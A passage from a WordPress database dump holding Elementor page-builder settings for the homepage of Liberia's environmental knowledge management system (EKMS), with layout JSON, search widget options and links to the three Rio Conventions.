EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(19121,2798,'_elementor_version','2.7.5'),(19122,2798,'_elementor_template_type','wp-page'),(19123,2798,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19126,2799,'_wp_page_template','default'),(19127,2799,'_elementor_edit_mode','builder'),(19128,2799,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again 